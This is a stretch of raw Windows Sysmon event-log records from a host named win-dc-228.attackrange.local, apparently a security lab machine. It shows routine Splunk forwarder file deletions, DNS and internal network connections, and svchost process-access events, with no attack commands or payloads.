SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=208BE01A44A5CB28500F7E7A52EC4E57,SHA256=1DA44C22C07431C50C8552290031F18DF23023EF5AAAE715210F493B909E048F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200132Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:23.847{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=640C8C70F210E9D6B584A49AF5DEF7EB,SHA256=5CA29C7B90BB0EDC39D77827B3EA9F880860B82474514F4095E0DA9A7AAB850A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200131Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:19.169{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-55337- 23542300x80000000000000002200134Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:24.862{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B652D8002DA4233BCD13ED1A06BFE890,SHA256=71163F96132CBA8AA9A00B7AF94AA032C4602C7E98B44981CBCDE23491949089,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200133Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:24.722{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=50E56CC53C734038B9D4CD6323BF622C,SHA256=64CFCE72D92FABD216D1DE210FA0852E0698DBD9FAED3450CF5E925B5FE3C8D5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200136Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:25.878{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A49E8CCC88206886ACFB1FB1F4D3572,SHA256=CF8421495126A543E41524482C35067089B81F2FBECA529F62A4FB0DC866F9D8,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200135Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:21.935{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55104-false10.0.1.12-8000- 23542300x80000000000000002200137Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:26.878{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C126FD5061A0C6CA710C8B4CAEA9FBF,SHA256=E8D18630400F1D9D7463877A1150801DB19341E0838B06EABBD5CE5B4BB884DA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200138Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:27.894{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=300516E03032B572A178347F601AF97C,SHA256=644FF75E44CAEDF241913CCA48EEAA9F4AB9F692D8D114F62D78AED043FE3DBC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200139Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:28.925{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=707ED8496B13BD838046AFF5F665AD79,SHA256=159EE33747B3E23FBBC329A12A6F342C59386EFC93937C904AC7266A8C9C999D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200142Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:29.941{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CDB9B4A9DEED879E3AB89B53400AE85A,SHA256=7966A08A734A6256FCB3144C5DCB8B85EC21BD252D42B1701960C2EA34DE9B63,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200141Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:26.219{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetruefe80:0:0:0:0:ffff:ffff:fffe-51709-true2001:500:200:0:0:0:0:bb.root-servers.net53domain 23542300x80000000000000002200140Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:29.378{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=033FD503A4D5F9A34B0DF0F846329B10,SHA256=A5BBBF8EA0E1B7EE364E070B31B936784A3CFEC1BA595A189A44095CB715F1B7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200144Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:30.956{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D1EA19FBE6E6DD8083D66BF778EA8AC,SHA256=024DAF6D6B088354BFEB72E229D8400104E9C301DAD56A9316E7F118E08DFF37,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200143Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:26.951{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55105-false10.0.1.12-8000- 23542300x80000000000000002200145Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:31.956{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89A303356F8A7160E3A5C73BD903E898,SHA256=45D170C016C4687AC418D0F7BC280B538652647851E79B892BEECBF24D678937,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200146Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:32.987{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C90D41AF21E758D134A131C2E43A8356,SHA256=A95B4022F5082607C4D65CCDDDA6FF4386EE0D0893EF4FAB5F9E482C90BE599A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200147Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:33.988{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37F8DDBC991828708B6EA805654D2042,SHA256=EE63BB762B8F989D0E50F6C591FFFDEF66F96FCF9A0785BF5E9DAC22A2700D83,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200154Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:31.982{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55106-false10.0.1.12-8000- 23542300x80000000000000002200153Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:35.191{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=08FFEA983A8B1B8DC892CB278CD41FCA,SHA256=7300B7197F6E3F7F75E07F7ACB80244D1D4656ABA41E7E686691FE0CBCBAFAE1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200152Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:35.191{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D162809D7D875113DBA0EFE1FFEC5E83,SHA256=B5B8AC0A8EDC2D5AB5541C04A33EE59BE8FDCA70B6D8B3D0119A6D4D600B3612,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002200151Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:35.191{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-842F-603E-1600-00000000AD01}1340C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200150Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:35.191{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-842F-603E-1600-00000000AD01}1340C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200149Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:35.191{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-842F-603E-1600-00000000AD01}1340C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002200148Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:35.019{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1AC287FAEB969AFEE05948C71B4A3B25,SHA256=102A4DAA226E71F715E708B97E48138359D4B99DFA5657857E142073016D28E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200155Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:36.050{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7F3A99500024A522B49DAB02E8B7C5C2,SHA256=B9A13B5B07806FCBE2BA7C14F1DC44CC72B1A00CD72B2A2CBB9FE5485ABD0F71,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200156Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:37.050{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=59E43CB7F4705E8954D0A7298A98E8CE,SHA256=846FEA2E87265B44478AB0EC63BFA0FE8E64D12A646D50050989694ECF29DC21,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200157Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:38.066{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CDA4FE218387390F23E6EB43C3C0191D,SHA256=E1DFE174A00D875173F8F78D69CED2CCA25B633B11EAF7F9FF0E33DC5130D558,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200158Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:39.097{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=529BFB8E191435DA6CFCE1D9294E8E75,SHA256=511A83973FCF766A408EF93B45270A87E990E23C1C8B3EE2D9C4A0EC7EEA780E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200161Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:40.206{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DCE7B1A9ACD7AA05ACC1E888296B4000,SHA256=299CAB2B5062A17C61AD5BD17BA334D9241912EE71B4DEB5DD5AB7368C03896D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200160Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:40.206{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=08FFEA983A8B1B8DC892CB278CD41FCA,SHA256=7300B7197F6E3F7F75E07F7ACB80244D1D4656ABA41E7E686691FE0CBCBAFAE1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200159Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:40.113{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0486A8EEF5275005E5A3C85C8F161273,SHA256=F96BEEFF1C5E35627AA601D312303E17B9E9AC585FB06AA2E887E1AA39B7DDEC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200163Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:41.128{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3160AC7F9043B838A6421B1E399B1A6E,SHA256=64D685672CAEEDEBAA1F0774F02B4636C162807E0D48F016387A2F97E0B2813A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200162Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:37.013{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55107-false10.0.1.12-8000- 23542300x80000000000000002200164Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:42.144{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC7EA4A6CBC2DB2E6B45EC2FFD0D020A,SHA256=1131187A4EC28B755B28A6975BCF8390A93A576E84B716F9736F821A13061985,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200166Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:43.159{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DCE7B1A9ACD7AA05ACC1E888296B4000,SHA256=299CAB2B5062A17C61AD5BD17BA334D9241912EE71B4DEB5DD5AB7368C03896D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200165Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:43.159{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2BE960788DFDF999C1B20E400E7F2D01,SHA256=E1C25704242831DD8BBAFD2C0D7B34F8B67DF489538482983F96BB30BC43FA0D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200168Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:44.191{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5274E027BB21BE57CFDFEC32CA1A02DE,SHA256=C4D963D3841C11635A6242C42A8DCB3F23306ACEAC0F1454D08B0378A6B206C8,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200167Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:39.904{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local55161- 23542300x80000000000000002200171Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:45.222{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D90A9BBC2A78C9414E3716B86CF6B737,SHA256=FCA28D632FC94BC92916E3D845E3B4035BA26DC57758B37FCEE27056586C982D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200170Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:45.206{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=13EB5CF6DB32AD652224AA459D8F2D2C,SHA256=728B5249F6952E040417A1EA1ECBF5998501173BBAEA02C0A9FE32A09A06CB0B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200169Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:40.919{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-55161- 23542300x80000000000000002200173Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:46.238{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94B356A77A54C96A1D88455A9B937D20,SHA256=15358EFAB630089DE707B1A6BB305ABAA207CD7213F3505ACB40BBD00AF7AE64,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200172Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:42.060{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55108-false10.0.1.12-8000- 23542300x80000000000000002200175Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:47.284{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5CCDAF10B87A1D9DCEC2C5F15A482B24,SHA256=620858EF88C3A63C799A04F7991136F96AD6A2634BA06C9889405A06E9037CB2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200174Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:47.253{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE170C2F0F2C48EF273BD04E9186B23B,SHA256=5609EB4B74452180FD88907D910C14A52EACE0455E8348D4784BB39B40C640C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200177Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:48.300{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C255B4B7520C34709B047BA055CCE758,SHA256=36443F9D5E08D20077529EF207353E6BAB7082FF9FBB827097CDCE4077D43C31,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200176Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:43.935{5ABCFE62-842F-603E-1500-00000000AD01}1104C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetrue7f00:1:0:0:98c0:a3ad:1e2:ffff-55161-true7f00:1:0:0:0:0:0:0-53domain 23542300x80000000000000002200178Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:49.300{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A83420FAF1921117802AD46C3C571BAF,SHA256=10BBA68C80A741DF149528504341D99A5745E08A2893921990DAF937222A1A44,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200179Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:50.316{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=284E25AD4C641C4F4A405D72FF2C5A4E,SHA256=D1140FD2D273758C1044EEAE78B68DDAB02B5D3D4E8B8D0B628F2D57BDEEC8B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200182Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:52:51.363{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0344113B971F409BF3318AEB58066BE5,SHA256=357887CA8CD5201E6F8AACC071296C928F33ED2EF5B77F7E80A28BE6E1478A67,IMPHASH=00000000000000000000000000000000falsetrue 